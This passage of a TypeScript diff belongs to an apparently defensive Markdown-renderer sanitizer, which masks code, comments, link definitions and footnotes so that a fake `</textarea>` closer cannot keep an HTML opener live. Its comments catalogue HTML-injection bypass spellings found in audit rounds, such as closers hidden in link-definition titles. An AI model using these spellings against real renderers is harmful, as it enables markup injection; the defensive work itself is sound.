+ * LITERALLY TRUE is worse than no table: it converts an unexamined line into a
803
+ * documented decision. When you change a pass, restate what it NOW claims and
804
+ * re-derive every other entry from the code — do not copy the previous wording
805
+ * forward.
806
+ *
807
+ * THE INVARIANT THAT ACTUALLY MATTERS:
808
+ *
809
+ * For every line L of the document and every block-level construct that can
810
+ * OPEN on L, some pass must examine L at L's own CONTENT COLUMN — the column
811
+ * at which CommonMark itself would begin parsing L, after every enclosing
812
+ * container prefix (blockquote markers, list-item content columns) has been
813
+ * consumed. "Examined" means the line is a member of that pass's scanned run,
814
+ * cut at that column; being merely SKIPPED OVER while state is updated does
815
+ * not count. Constructs that are not line-anchored at all (inline code spans,
816
+ * HTML comments, link reference definitions, inline link/image payloads) are
817
+ * covered instead by a CONTAINER-AGNOSTIC pass that runs once over the whole
818
+ * document.
819
+ *
820
+ * AND: every region that CommonMark turns into an ATTRIBUTE OR AN IDENTIFIER
821
+ * rather than document text is a shelter of the same kind, whether or not it
822
+ * is line-anchored. A reference definition's destination/title and an INLINE
823
+ * link's destination/title are the same thing to remark — both become
824
+ * href/title and never appear as HTML — so both need a pass. Round 19 found
825
+ * the inline half entirely uncovered; it then implemented that generalization
826
+ * for only the PARENTHESISED half of the constructs the generalization names,
827
+ * and round 20 found the BRACKETED half — an image's alt, a reference label, a
828
+ * footnote label — uncovered in exactly the same way.
829
+ *
830
+ * So the checklist for a newly supported construct is: which of its text does
831
+ * remark consume into an attribute or an identifier — INCLUDING bracket text
832
+ * under `!` and reference/footnote labels — rather than emit as document HTML?
833
+ * Every such region needs a pass. The complement matters just as much: text
834
+ * remark DOES emit (an inline link's `[…]`, a bare shortcut reference's
835
+ * `[…]`) must stay VISIBLE, because a closer written there is real.
836
+ *
837
+ * AND: a length cap or a parse failure inside any of these passes must BLANK,
838
+ * never SKIP. `-1`-on-cap is the fail-OPEN shape `ba4a526b` closed for
839
+ * over-cap inline code spans and round 20 found reintroduced in
840
+ * `parseInlineLinkPayload` and the link-definition regexes. A cap is a
841
+ * BLANKING BOUNDARY: blank up to it. Only a genuinely unparseable SHAPE may
842
+ * decline, and only because remark will not read it as a link either.
843
+ *
844
+ * THAT RULE WAS STATED AND NOT STRUCTURALLY ENFORCED, so every new parser
845
+ * re-litigated it and sometimes lost: `ba4a526b` (over-cap code spans), round
846
+ * 20 (payload + definition CAPS), round 21 (the definition SHAPES the same
847
+ * round left behind). It is now enforced by SHAPE rather than by discipline —
848
+ * the container-agnostic passes have exactly TWO stages, and the stage
849
+ * decides the fail direction:
850
+ *
851
+ * RECOGNITION — "is this the construct at all?" MAY decline, and must,
852
+ * because every recognition decline is a spelling CommonMark ALSO refuses:
853
+ * remark emits the text as HTML, so a closer written in it is REAL and
854
+ * blanking it would over-escape a genuine element.
855
+ *
856
+ * CONSUMPTION — "the construct was recognized" may NEVER decline. Every
857
+ * give-up routes through ONE channel per pass, whose DEFAULT is blanking to
858
+ * the construct's CommonMark bound (the next blank line):
859
+ * `blankInlineLinkPayloads` → `paragraphEnd`, `blankLinkDefinitions` →
860
+ * `blankLinesToParagraphBound`. A pass cannot "forget" to blank, because
861
+ * the give-up path IS the blanking path; there is no `return -1` reachable
862
+ * after commitment.
863
+ *
864
+ * EXIT-PATH TABLE — every exit of the FOUR passes that can decline,
865
+ * classified. Keep it accurate when you touch them; an unclassified exit is
866
+ * the next instance.
867
+ *
868
+ * THE RULE THAT PRODUCED THIS ROUND: A NEW PASS MUST LAND IN BOTH TABLES —
869
+ * this one and "WHICH LINES EACH PASS CLAIMS" below — IN THE SAME COMMIT.
870
+ * Round 22 added `blankUnreferencedFootnotes` to the pipeline with an entry in
871
+ * NEITHER, and it is the pass that shipped a live fail-open (round 23: PASS 1
872
+ * counted PHANTOM references, so a definition holding a `</textarea>` stayed
873
+ * in the haystack and the opener above it stayed live, in ten spellings).
874
+ * These two tables have caught six literally-false or missing claims across
875
+ * six rounds; they are the instrument, and the round that skipped them is the
876
+ * round that regressed. Filling them in is not documentation, it is the audit.
877
+ *
878
+ * blankLinkDefinitions
879
+ * R no `[` on the line / `LINK_DEF_OPEN_RE` fails → not a definition line.
880
+ * R `\[^` (GFM footnote), REFERENCED → BLOCK-parsed body, may
881
+ * hold real HTML (r19).
882
+ * Only when the label is
883
+ * REFERENCED: r22 found
884
+ * the decline fail-OPEN
885
+ * for the unreferenced
886
+ * case, which
887
+ * `blankUnreferencedFootnotes`
888
+ * now blanks whole.
889
+ * R `findLabelClose`: `]` not followed by `:` → shortcut reference or
890
+ * plain text; remark
891
+ * EMITS it (the same
892
+ * exclusion
893
+ * `blankBracketLabels`
894
+ * documents).
895
+ * R `findLabelClose`: unescaped `[` in the label → CommonMark rejects the
896
+ * label → paragraph text.
897
+ * R `findLabelClose`: paragraph bound, no `]:` → an ordinary
898
+ * `[`-leading prose
899
+ * paragraph.
900
+ * R `parseDestOnLine` -1 (angle dest unclosed) → no line ending allowed
901
+ * in `<…>`, and a bare
902
+ * dest may not start with
903
+ * `<` → not a definition.
904
+ * R `parseDefTail`/`parseTitleTail` `decline` → trailing content, or a
905
+ * title neither
906
+ * space-separated nor
907
+ * delimiter-opened →
908
+ * remark reads a
909
+ * PARAGRAPH. On the
910
+ * OPENER line this
911
+ * unwinds the WHOLE
912
+ * construct (nothing is
913
+ * blanked). On a
914
+ * CONTINUATION line it
915
+ * splits in TWO, and the
916
+ * old single sentence
917
+ * was true of only one
918
+ * (r22):
919
+ * · after `needTitle`
920
+ * the definition WAS
921
+ * already complete
922
+ * (a title is
923
+ * optional), so
924
+ * stopping is exact;
925
+ * · after `needDest`
926
+ * it was NOT — with
927
+ * no parseable
928
+ * destination remark
929
+ * reads the whole run
930
+ * as a PARAGRAPH —
931
+ * and lines
932
+ * `i..close.line`
933
+ * are ALREADY blanked
934
+ * by the committed
935
+ * loop. So this exit
936
+ * OVER-blanks the
937
+ * label lines; safe
938
+ * because
939
+ * over-blanking only
940
+ * hides closers.
941
+ * C `openTitle` (title opens, never closes) → BLANK to the paragraph
942
+ * bound.
943
+ * C end of `lines` / blank line while continuing → everything up to the
944
+ * bound is already
945
+ * blanked.
946
+ * (no length cap exists in this pass at all)
947
+ *
948
+ * blankInlineLinkPayloads / parseInlineLinkPayload
949
+ * C `q >= limit`, input REMAINS past the cap → returns `limit`, and
950
+ * the caller widens to
951
+ * `paragraphEnd` (r20).
952
+ * R `q >= limit` because the INPUT IS EXHAUSTED → returns -1. Nothing
953
+ * closes the payload and
954
+ * nothing will, so remark
955
+ * reads text too. Split
956
+ * out in r22: it used to
957
+ * share the cap exit, so
958
+ * the ordinary STREAMING
959
+ * tail `see [a](/x`
960
+ * blanked its paragraph
961
+ * and flickered.
962
+ * R angle dest not closed before `\n`/end → CommonMark forbids a
963
+ * line ending in `<…>`.
964
+ * R bare dest with unbalanced `(` → not a link → text.
965
+ * R no `)` where the payload must end → not a link → text.
966
+ * - `s[q] !== close` after the title loop → UNREACHABLE: the loop
967
+ * exits only on the
968
+ * closer or on `q >=
969
+ * limit`, and the latter
970
+ * returns `overflow`
971
+ * first.
972
+ *
973
+ * blankUnreferencedFootnotes (round 23 — the entry round 22 never wrote)
974
+ * R `masked.indexOf('[^') === -1` (whole-pass skip) → the document contains
975
+ * no footnote SPELLING at
976
+ * all, so there is nothing
977
+ * to blank. Exact.
978
+ * R `FOOTNOTE_DEF_OPEN_RE` fails / no `:` after the
979
+ * label / `footnoteLabelEnd` -1 on the OPENER → not a definition line;
980
+ * remark reads a paragraph
981
+ * and any closer on it is
982
+ * REAL.
983
+ * R label IS referenced (in the REF-MASK) → round 19's case:
984
+ * remark keeps the
985
+ * definition, its body is
986
+ * BLOCK-parsed and may
987
+ * hold real HTML.
988
+ * C `footnoteLabelEnd === -1` mid-line → `break` → abandons the REST OF
989
+ * THE LINE's references.
990
+ * Fail-CLOSED (fewer
991
+ * references ⇒ more
992
+ * definitions blanked),
993
+ * but note the shape it
994
+ * gives up on: a line
995
+ * `[^x[ … [^f]` silently
996
+ * stops counting at the
997
+ * voided label, so a REAL
998
+ * `[^f]` after it can be
999
+ * missed and its
1000
+ * definition over-blanked
1001
+ * into escaped source
1002
+ * (cosmetic).
1003
+ * C body walk `break` on a SECOND definition line → the body ended; the
1004
+ * neighbour is blanked (or
1005
+ * not) on its OWN merits.
1006
+ * C body walk `break` on a de-indented line after a
1007
+ * blank one → GFM's own body bound.
1008
+ * (both body `break`s only SHORTEN the blanked range, i.e. leave MORE
1009
+ * haystack visible — the same direction as declining the definition
1010
+ * entirely, which is round 19's shipped behaviour, never a new hole)
1011
+ * (no length cap exists in this pass at all)
1012
+ *
1013
+ * blankBracketLabels
1014
+ * R no `[` in the document → no bracket construct.
1015
+ * R `]` with an empty stack → closes nothing.
1016
+ * - no length cap and no parse that can fail: the walk is total over the
1017
+ * document and crosses newlines, so it has NO give-up path to classify.
1018
+ *
1019
+ * WHICH LINES EACH PASS CLAIMS, AND AT WHAT COLUMN:
1020
+ *
1021
+ * findInlineCodeRanges — EVERY line, at column 0 of its PARAGRAPH SEGMENT
1022
+ * (a maximal run of non-blank lines). Container-agnostic: backtick runs are
1023
+ * matched with no column or prefix anchoring, so a `> ` / indent prefix is
1024
+ * ordinary text between ticks. Spans CROSS line breaks (round 18) and stop
1025
+ * at a paragraph break, which is exactly CommonMark's bound.
1026
+ * blankFencedRegions — every line of the run it is GIVEN, at that run's
1027
+ * column (the caller cut it). Absolute-column-limited by `FENCE_RE`'s 0..3
1028
+ * indent cap, which is WHY the container passes must re-cut and re-run it.
1029
+ * blankIndentedCode — every line of the run it is given, at that run's
1030
+ * column, with a list-content-column stack for the +4 threshold.
1031
+ * blankLinkDefinitions — EVERY line, in TWO dimensions that must both be
1032
+ * stated, because round 21 found the entry true of the first and silently
1033
+ * false of the second.
1034
+ * COLUMN: at column 0 AND at the column its own prefix reaches.
1035
+ * `LINK_DEF_CONTAINER_PREFIX` absorbs a blockquote run and AT MOST ONE
1036
+ * list marker, so the top-level call covers a definition at nesting depth
1037
+ * 0 or 1 directly. DEEPER nesting (`- - [a]: …`) is NOT covered by the
1038
+ * top-level call — round 19's corrected entry — and is reached only
1039
+ * because both container passes re-run this pass on their stripped runs,
1040
+ * and `blankListItemCode` re-cuts nested markers by recursing into
1041
+ * ITSELF. That re-cut is load-bearing, not redundancy.
1042
+ * SHAPE: what the label, destination and title may CONTAIN — the
1043
+ * dimension the old wording never mentioned, so five ESCAPED-delimiter
1044
+ * spellings and five MULTI-LINE spellings were "covered" by an entry that
1045
+ * had not examined them. The pass is now a CHARACTER PARSER, not a line
1046
+ * regex: `\` + one character is consumed as a unit EVERYWHERE (so a
1047
+ * title may hold `\"` / `\'` / `\)` and a label `\]`), the LABEL may
1048
+ * span lines up to the paragraph bound, and an unterminated TITLE is
1049
+ * blanked to that same bound. There is no length cap of any kind. What it
1050
+ * does NOT claim, and why, is on the exits themselves (see below).
1051
+ * blankUnreferencedFootnotes — EVERY line, container-agnostic and at ANY
1052
+ * depth: `FOOTNOTE_DEF_OPEN_RE`'s own prefix absorbs a blockquote run plus
1053
+ * ANY NUMBER of list markers, so unlike `blankLinkDefinitions` this pass
1054
+ * needs no container re-cut — and could not use one, because its reference
1055
+ * set is document-GLOBAL and a stripped run cannot see it. Exactly ONE
1056
+ * top-level call. No length cap of any kind.
1057
+ * IT READS TWO SOURCES, and that split is the security-load-bearing part
1058
+ * (round 23):
1059
+ * DEFINITIONS from the current MASK — a definition an earlier pass hid is
1060
+ * not blanked, which leaves it in the haystack (round 19's direction).
1061
+ * REFERENCES from a SEPARATE, MORE-BLANKED copy (`footnoteReferenceMask`),
1062
+ * because every region remark consumes into an ATTRIBUTE or drops — image
1063
+ * alt, full-reference label, inline link title / angle destination, HTML
1064
+ * comment, raw HTML block, inline tag attribute, autolink — yields a
1065
+ * PHANTOM reference, and a phantom keeps a dropped definition (and its
1066
+ * `</textarea>`) in the haystack: fail-OPEN, reproduced live in ten
1067
+ * spellings. Counting FEWER references only blanks MORE, so that copy may
1068
+ * over-blank freely.
1069
+ * CLAIMED BODY: the label line, its lazy paragraph continuations, and
1070
+ * further blocks indented >= 4 columns past the blockquote run.
1071
+ * blankInlineLinkPayloads — EVERY inline link/image payload in the document,
1072
+ * container-agnostic: the scan is anchored on the `](` bigram with no column
1073
+ * or prefix anchoring, so a container prefix is ordinary text ahead of it.
1074
+ * Claims ONLY the `(…)` payload — never the `[…]` text of an INLINE LINK,
1075
+ * which is inline-parsed and reaches the document as HTML. Its cap
1076
+ * (`INLINE_LINK_PAYLOAD_MAX`) BLANKS THROUGH rather than declining; only an
1077
+ * unparseable SHAPE declines (round 20).
1078
+ * blankBracketLabels — EVERY `[…]` group in the document whose text remark
1079
+ * consumes into an attribute or an identifier: an image's alt (`[` preceded
1080
+ * by `!`), the second group of a `][` adjacency (a full reference's label),
1081
+ * the first group of a `][]` adjacency (a collapsed reference's identifier),
1082
+ * and a footnote label (`[^…]`, reference AND definition). Container-
1083
+ * agnostic: one left-to-right bracket walk, no column or prefix anchoring.
1084
+ * Claims NEITHER an inline link's `[…]` NOR a bare shortcut reference's —
1085
+ * remark emits both as HTML, so a closer there is real (round 20). The
1086
+ * `][` / `][]` adjacency is compared PER NESTING DEPTH (round 23 — a single
1087
+ * `prev` let a nested group clobber the sibling it had to be compared with,
1088
+ * so `[txt][[^f]]`'s label was never claimed). Its ONE option,
1089
+ * `{ footnoteLabels: false }`, is for `footnoteReferenceMask` only.
1090
+ * blankComments — EVERY line, container-agnostic: `HTML_COMMENT_RE` is
1091
+ * `[\s\S]`-based and anchored nowhere, so a comment matches straight through
1092
+ * any prefix. Runs LAST, over the masked copy (see its docblock).
1093
+ * blankQuotedCode — supplies runs cut at the BLOCKQUOTE content column,
1094
+ * for every maximal run of quote-prefixed lines, INCLUDING the line that
1095
+ * opens the quote (the prefix regex matches it like any other).
1096
+ * blankListItemCode — supplies runs cut at the LIST-ITEM content column
1097
+ * for EVERY line inside a list item at ANY content column >= 1 (round 19 —
1098
+ * the gate used to be `>= 4` on the claim that "below column 4 the top-level
1099
+ * passes already cover the line at the right column", which is true of a
1100
+ * CONTINUATION line and FALSE of the MARKER line: at content column 2 or 3
1101
+ * the marker line is examined only at column 0, where the leading `- ` /
1102
+ * `1. ` is not whitespace and `FENCE_RE` cannot match). Includes THE MARKER
1103
+ * LINE ITSELF (round 18) and re-cuts NESTED markers by recursing into itself
1104
+ * (round 19), since `LIST_MARKER_RE` matches only the FIRST marker on a
1105
+ * line.
1106
+ *
1107
+ * The two container passes call each other AND `blankListItemCode` calls itself,
1108
+ * and all of them call the fence + indented + link-definition passes, so a line
1109
+ * nested in any order and any DEPTH of containers is eventually cut to its own
1110
+ * content column. That composition is a MEANS to the invariant above, not a
1111
+ * substitute for it. When adding a pass or a container, the question to answer
1112
+ * is "which lines does it claim, at which column, and is any line now claimed by
1113
+ * nobody" — not "does the call graph look symmetric".
1114
+ */
1115
+
1116
+ /**
1117
+ * Length-preserving blank of MANY ranges in one pass. Ranges must be
1118
+ * non-overlapping and ascending.
1119
+ *
1120
+ * THE ONLY BLANKING PRIMITIVE (round 18 — performance). There used to be a
1121
+ * single-range `blankRange` beside it, and `blankIndentedCode` /
1122
+ * `blankFencedRegions` / `blankComments` each folded the document through it
1123
+ * ONCE PER LINE OR REGION. Every call rebuilds the entire string, so masking an
1124
+ * all-indented-code document was QUADRATIC — measured on
1125
+ * `__buildCloserHaystackForTest`: 37 KB → 6 ms, 151 KB → 178 ms, 389 KB →
1126
+ * 1127 ms, 989 KB → 3753 ms (2.5x input ⇒ ~6x time), and the two container
1127
+ * passes re-run both over every nested run, multiplying the constant. A ~400 KB
1128
+ * KB article or release-notes page — all of which go through this renderer —
1129
+ * blocked the main thread for over a second. Every pass now COLLECTS ranges and
1130
+ * applies them here exactly once, which is what the inline pass already did.
1131
+ * After, same four sizes and same harness: 2 ms / 5 ms / 12 ms / 28 ms — dead
1132
+ * linear at ~28 ns/char, a 134x improvement at 989 KB.
1133
+ *
1134
+ * Do not reintroduce a per-range helper; a pass that blanks in a loop is the
1135
+ * regression.
1136
+ */
1137
+ function blankRanges(masked: string, ranges: Array<[number, number]>): string {
1138
+ if (ranges.length === 0) return masked
1139
+ const parts: string[] = []
1140
+ let cursor = 0
1141
+ for (const [from, to] of ranges) {
1142
+ parts.push(masked.slice(cursor, from), masked.slice(from, to).replace(/[^\n]/g, ' '))
1143
+ cursor = to
1144
+ }
1145
+ parts.push(masked.slice(cursor))
1146
+ return parts.join('')
1147
+ }
1148
+
1149
+ /** One scannable line: where it starts, and (for container-nested scans) where
1150
+ * its scanned content starts once the container prefix is stripped. */
1151
+ interface MaskLine {
1152
+ start: number
1153
+ contentStart: number
1154
+ content: string
1155
+ }
1156
+
1157
+ function toMaskLines(source: string): MaskLine[] {
1158
+ const out: MaskLine[] = []
1159
+ let offset = 0
1160
+ for (const line of source.split('\n')) {
1161
+ out.push({ start: offset, contentStart: offset, content: line })
1162
+ offset += line.length + 1
1163
+ }
1164
+ return out
1165
+ }
1166
+
1167
+ /**
1168
+ * Blank every FENCED region in a line run, using the real CommonMark fence
1169
+ * state machine (`createFenceTracker`) rather than a regex.
1170
+ *
1171
+ * This replaces the old `blankUnclosedFence` + `PROTECTED_SPAN_RE` fence
1172
+ * alternative and subsumes both:
1173
+ * - a CLOSED fence is blanked from its opener line through its closer line;
1174
+ * - an EOF-terminated fence is blanked from its opener line to the end of the
1175
+ * run (the case `blankUnclosedFence` covered);
1176
+ * - a would-be closer carrying an INFO STRING (```` ```html ````) no longer
1177
+ * ends the region, because the tracker applies CommonMark's rule that a
1178
+ * closer may not have one. `PROTECTED_SPAN_RE` did end the span there, so
1179
+ * ` ```js … ```html\n</textarea>\n``` ` left the `</textarea>` unmasked and
1180
+ * a prose opener above it stayed live.
1181
+ */
1182
+ function blankFencedRegions(masked: string, lines: MaskLine[]): string {
1183
+ const fences = createFenceTracker()
1184
+ const ranges: Array<[number, number]> = []
1185
+ let openStart: number | null = null
1186
+ let lastEnd = 0
1187
+ for (const line of lines) {
1188
+ const role = fences.push(line.content)
1189
+ lastEnd = line.contentStart + line.content.length
1190
+ if (role === 'open') openStart = line.start
1191
+ else if (role === 'close' && openStart !== null) {
1192
+ ranges.push([openStart, lastEnd])
1193
+ openStart = null
1194
+ }
1195
+ }
1196
+ if (openStart !== null) ranges.push([openStart, lastEnd])
1197
+ return blankRanges(masked, ranges)
1198
+ }
1199
+
1200
+ /**
1201
+ * Blank INDENTED code blocks. A `</textarea>` written as an indented code
1202
+ * sample is code, not a closer — but `FENCE_RE` deliberately caps fence indent
1203
+ * at 3 spaces, so the tracker never sees these lines.
1204
+ *
1205
+ * The threshold is LIST-AWARE, not a flat 4 columns. CommonMark measures
1206
+ * indented code from the enclosing list item's CONTENT column, so under
1207
+ * `1. ` (content column 4) a 4-space line is a paragraph continuation, not
1208
+ * code — and `"1. Here is a form:\n\n <textarea>\n </textarea>\n"` had
1209
+ * its closer blanked, `hasLaterCloser` returned false, and a perfectly real
1210
+ * element got escaped. A numbered list containing markup is a very ordinary
1211
+ * chat answer, so "fail closed" is not a good enough excuse here.
1212
+ *
1213
+ * The walk mirrors `blankQuotedCode`'s line-state approach: a stack of open
1214
+ * list content columns, `code` meaning `indent >= top + 4`. Blank lines keep
1215
+ * the state (a list item survives them); a line indented below the top of the
1216
+ * stack pops it. A line indented past the code threshold is treated as code
1217
+ * BEFORE it is considered as a list marker.
1218
+ *
1219
+ * SCAN-SOURCE INVERSION (same reasoning as `blankComments`, and NOT the shared
1220
+ * contract): the caller must pass lines re-derived from the CURRENT mask, not
1221
+ * from `folded`. Fence content is already blanked by `blankFencedRegions`, but
1222
+ * that only holds for WRITING the mask — a walk over `folded` still SEES those
1223
+ * lines, so a `- x` written inside a fence pushed a content column of 2 and a
1224
+ * later top-level column-4 indented-code line then failed `indent >= top + 4`,
1225
+ * went unblanked, and its code-sample `</textarea>` kept a prose opener LIVE.
1226
+ * Over the masked copy those lines are all spaces, hit the `isBlankLine`
1227
+ * continue, preserve list state and push no bogus column.
1228
+ *
1229
+ * CONTENT-COLUMN CLAMP: CommonMark clamps an item's content column to
1230
+ * `markerEnd + 1` when the first block starts MORE than 4 spaces after the
1231
+ * marker — the remainder is indented code INSIDE the item. Taking the literal
1232
+ * column instead meant `-` + six spaces raised the threshold to 11, so a
1233
+ * column-7 `</textarea>` code sample was not blanked.
1234
+ *
1235
+ * KNOWN OMISSION (deliberate, fail-CLOSED): there is NO paragraph state. Under
1236
+ * CommonMark indented code cannot interrupt a paragraph, so a LAZY
1237
+ * continuation line — `'Here is a form: <textarea>\nsome paragraph\n </textarea>\n'`
1238
+ * — is paragraph text, yet this walk blanks it as code and the (real, properly
1239
+ * closed) element is escaped to visible source. That is cosmetic, and the
1240
+ * option NOT taken here is the fail-OPEN direction: skipping the code test in
1241
+ * paragraph state means blanking LESS, i.e. more closers visible to
1242
+ * `hasLaterCloser` and more openers left live. The list-awareness above was
1243
+ * worth its risk because it is unconditional over an entire list item; this
1244
+ * one is not, so it is documented rather than implemented.
1245
+ */
1246
+ const LIST_MARKER_RE = /^([ \t]*)(?:[-*+]|\d{1,9}[.)])([ \t]+)(?=\S)/
1247
+
1248
+ /** Visual column of `upTo` chars of `line`, expanding tabs to 4-col stops. */
1249
+ function visualColumn(line: string, upTo: number): number {
1250
+ let col = 0
1251
+ for (let i = 0; i < upTo; i++) col = line[i] === '\t' ? col + 4 - (col % 4) : col + 1
1252
+ return col
1253
+ }
1254
+
1255
+ function leadingIndent(line: string): number {
1256
+ const ws = /^[ \t]*/.exec(line)![0]
1257
+ return visualColumn(line, ws.length)
1258
+ }
1259
+
1260
+ /** Character index at which `line` reaches visual column `col`, or -1 when the
1261
+ * column falls INSIDE a tab (no exact character boundary) or the line is too
1262
+ * short. The mask is length-preserving, so a container prefix can only ever be
1263
+ * cut at a character boundary; -1 makes the caller decline to strip, which
1264
+ * leaves the line looking indented and therefore blanks MORE (fail-CLOSED). */
1265
+ function charIndexAtColumn(line: string, col: number): number {
1266
+ let c = 0
1267
+ for (let i = 0; i < line.length; i++) {
1268
+ if (c === col) return i
1269
+ c = line[i] === '\t' ? c + 4 - (c % 4) : c + 1
1270
+ if (c > col) return -1
1271
+ }
1272
+ return c === col ? line.length : -1
1273
+ }
1274
+
1275
+ function blankIndentedCode(masked: string, lines: MaskLine[]): string {
1276
+ const listContentCols: number[] = []
1277
+ const ranges: Array<[number, number]> = []
1278
+ for (const line of lines) {
1279
+ // CommonMark's blank line (spaces/tabs, `\r`-tolerant), NOT `trim()` — see
1280
+ // `isBlankLine`. An NBSP-only line is CONTENT, and skipping it here as
1281
+ // "blank" is the same one-character reopening documented there.
1282
+ if (isBlankLine(line.content)) continue
1283
+ const indent = leadingIndent(line.content)
1284
+ const top = listContentCols.length ? listContentCols[listContentCols.length - 1] : 0
1285
+ if (indent >= top + 4) {
1286
+ ranges.push([line.contentStart, line.contentStart + line.content.length])
1287
+ continue
1288
+ }
1289
+ while (listContentCols.length && indent < listContentCols[listContentCols.length - 1])
1290
+ listContentCols.pop()
1291
+ const marker = LIST_MARKER_RE.exec(line.content)
1292
+ if (marker) {
1293
+ const markerEndCol = visualColumn(line.content, marker[0].length - marker[2].length)
1294
+ const contentCol = visualColumn(line.content, marker[0].length)
1295
+ listContentCols.push(contentCol - markerEndCol > 4 ? markerEndCol + 1 : contentCol)
1296
+ }
1297
+ }
1298
+ return blankRanges(masked, ranges)
1299
+ }
1300
+
1301
+ /** Re-derive scannable lines from the CURRENT mask, preserving each line's
1302
+ * original `start` / `contentStart` (every pass is length-preserving, so the
1303
+ * offsets transfer verbatim). See `blankIndentedCode`'s SCAN-SOURCE
1304
+ * INVERSION. */
1305
+ function remapToMask(masked: string, lines: MaskLine[]): MaskLine[] {
1306
+ return lines.map((line) => ({
1307
+ ...line,
1308
+ content: masked.slice(line.contentStart, line.contentStart + line.content.length),
1309
+ }))
1310
+ }
1311
+
1312
+ /**
1313
+ * Blank HTML COMMENTS. `<!-- </textarea> -->` is not a closer — parse5 consumes
1314
+ * it as comment data — yet it satisfied the raw substring search. The
1315
+ * unterminated form is blanked to EOF, matching what the tokenizer does with a
1316
+ * comment that never ends (and, again, failing closed).
1317
+ *
1318
+ * SCAN-SOURCE EXCEPTION: this is the ONE pass fed the already-masked copy
1319
+ * rather than the unmasked one. The shared contract exists because
1320
+ * the inline-code pass chews backticks off an unclosed fence opener and would
1321
+ * blind a fence scan — but for comments the reasoning INVERTS: a `<!--` inside a code
1322
+ * region is not a comment start, and treating it as one blanked the document to
1323
+ * EOF. Both `` Use `<!--` to start a comment. `` and a truncated `<!-- todo`
1324
+ * inside a ```html fence disabled EVERY later RAWTEXT closer in the message.
1325
+ * Running last over the masked copy is safe: all prior passes are
1326
+ * length-preserving so offsets still transfer verbatim, a `<!--` inside
1327
+ * fenced / inline / indented / quoted code is spaces by now and matches
1328
+ * nothing, and a genuine prose comment is untouched by any of them.
1329
+ */
1330
+ const HTML_COMMENT_RE = /<!--[\s\S]*?-->|<!--[\s\S]*$/g
1331
+
1332
+ function blankComments(masked: string, source: string): string {
1333
+ HTML_COMMENT_RE.lastIndex = 0
1334
+ const ranges: Array<[number, number]> = []
1335
+ let m: RegExpExecArray | null
1336
+ while ((m = HTML_COMMENT_RE.exec(source)) !== null) {
1337
+ ranges.push([m.index, m.index + m[0].length])
1338
+ if (m[0].length === 0) HTML_COMMENT_RE.lastIndex++
1339
+ }
1340
+ return blankRanges(masked, ranges)
1341
+ }
1342
+
1343
+ /**
1344
+ * Blank LINK REFERENCE DEFINITIONS (round 18 — SECURITY).
1345
+ *
1346
+ * `remark` consumes a definition ENTIRELY and emits no node for it, so a
1347
+ * `</textarea>` written in a definition's DESTINATION or TITLE is never a real
1348
+ * closer — but it survived into the closer haystack, `hasLaterCloser` returned
1349
+ * true and a prose `<textarea>` above stayed LIVE. Reproduced byte-identical for
1350
+ * both `[a]: /x "</textarea>"` and `[a]: </textarea>`.
1351
+ *
1352
+ * FAIL DIRECTION: blank the WHOLE line on a definition-SHAPED match, without
1353
+ * modelling "a definition may not interrupt a paragraph". Over-blanking here can
1354
+ * only hide closers, i.e. escape MORE openers — the fail-CLOSED direction — so
1355
+ * the loose shape is the correct bias.
1356
+ *
1357
+ * MULTI-LINE SPELLINGS (round 19). CommonMark lets the destination AND/OR the
1358
+ * title sit on lines FOLLOWING the label. The previous continuation state was a
1359
+ * single `expectTitle` boolean checked against a BARE QUOTED TITLE, so
1360
+ * `[a]:\n/x "</textarea>"` blanked the `[a]:` line and left the whole
1361
+ * `destination + title` line visible (reproduced live, `escapeUnknownHtmlTags`
1362
+ * byte-identical); so did `[a]:\n</textarea>`. remark consumes the entire
1363
+ * definition and emits no link node at all, so the closer is fake in every one
1364
+ * of these spellings. The state is now a three-valued
1365
+ * `'none' | 'needDest' | 'needTitle'`:
1366
+ *
1367
+ * - a definition line with NO destination → `needDest`
1368
+ * - a definition line with a destination but NO title → `needTitle`
1369
+ * - `needDest` accepts a `destination [title]` line, then falls to
1370
+ * `needTitle` (or `none` when that line carried the title)
1371
+ * - `needTitle` accepts a bare quoted/parenthesised title line
1372
+ *
1373
+ * `needDest`'s continuation shape is deliberately loose (any single
1374
+ * non-whitespace run), which can over-blank ONE line after a bare `[a]:` — the
1375
+ * fail-CLOSED direction, and `[a]:` alone is not a shape prose produces.
1376
+ *
1377
+ * FOOTNOTES ARE EXCLUDED (round 19). `\[[^\]\n]{0,999}\]:` also matched a GFM
1378
+ * footnote definition `[^a]: …`, whose content is BLOCK-parsed and therefore
1379
+ * may contain REAL html: `[^a]: <textarea>hi</textarea>` rendered as escaped
1380
+ * visible source while the byte-identical pair in prose rendered correctly.
1381
+ * Cosmetic (fail-closed) rather than a security defect, but wrong, so the label
1382
+ * now rejects a leading `^`.
1383
+ *
1384
+ * CONTAINER-AGNOSTIC BY CONSTRUCTION, like `blankComments` — the shape absorbs
1385
+ * an optional blockquote run and one list marker, so a definition written inside
1386
+ * a quote or ON a list-marker line is covered by the SINGLE top-level call and
1387
+ * the pass never has to be threaded through the container recursion at a
1388
+ * container-relative column. The marker-line sweep dimension added in this round
1389
+ * found exactly that shape (`- [a]: /x "</textarea>"`) live.
1390
+ */
1391
+ /**
1392
+ * The two `{0,16}` / `{1,16}` whitespace bounds here are the ONE cap in this
1393
+ * pass that may still decline a line, and it is unreachable as a fail-open: an
1394
+ * indent or a marker gap above 16 columns is also ≥ 4 columns past the
1395
+ * enclosing content column, so the line is INDENTED CODE and
1396
+ * `blankIndentedCode` has already blanked it. Verified live at gap 17
1397
+ * (`- ` + 16 spaces + `[a]: /x "</textarea>"` escapes correctly). Do not raise
1398
+ * them into an unbounded `*` on the assumption that "more is safer" — that
1399
+ * would let a 4-column-indented definition line escape the code path it
1400
+ * currently falls into.
1401
+ */
1402
+ const LINK_DEF_CONTAINER_PREFIX = ' {0,3}(?:>[ \\t]?)*[ \\t]{0,16}(?:(?:[-*+]|\\d{1,9}[.)])[ \\t]{1,16})?'
1403
+ /**
1404
+ * NO REGEX, AND NO LENGTH BOUND, ON LABEL / DESTINATION / TITLE
1405
+ * (round 20 removed the `{0,999}` caps; round 21 removed the regexes).
1406
+ *
1407
+ * Round 20 removed the counted caps because a regex that fails to match leaves
1408
+ * the line VISIBLE — the fail-OPEN direction this module's contract forbids.
1409
+ * It left the SHAPE of those regexes untouched, and the shape was
1410
+ * BACKSLASH-BLIND: `[^"\n]*` / `[^'\n]*` / `[^)\n]*` / `[^>\n]*` / `[^\]\n]*`
1411
+ * each stop at the FIRST delimiter, escaped or not, while CommonMark lets a
1412
+ * title hold `\"` / `\'` / `\)` and a label hold `\]`. The class stopped early,
1413
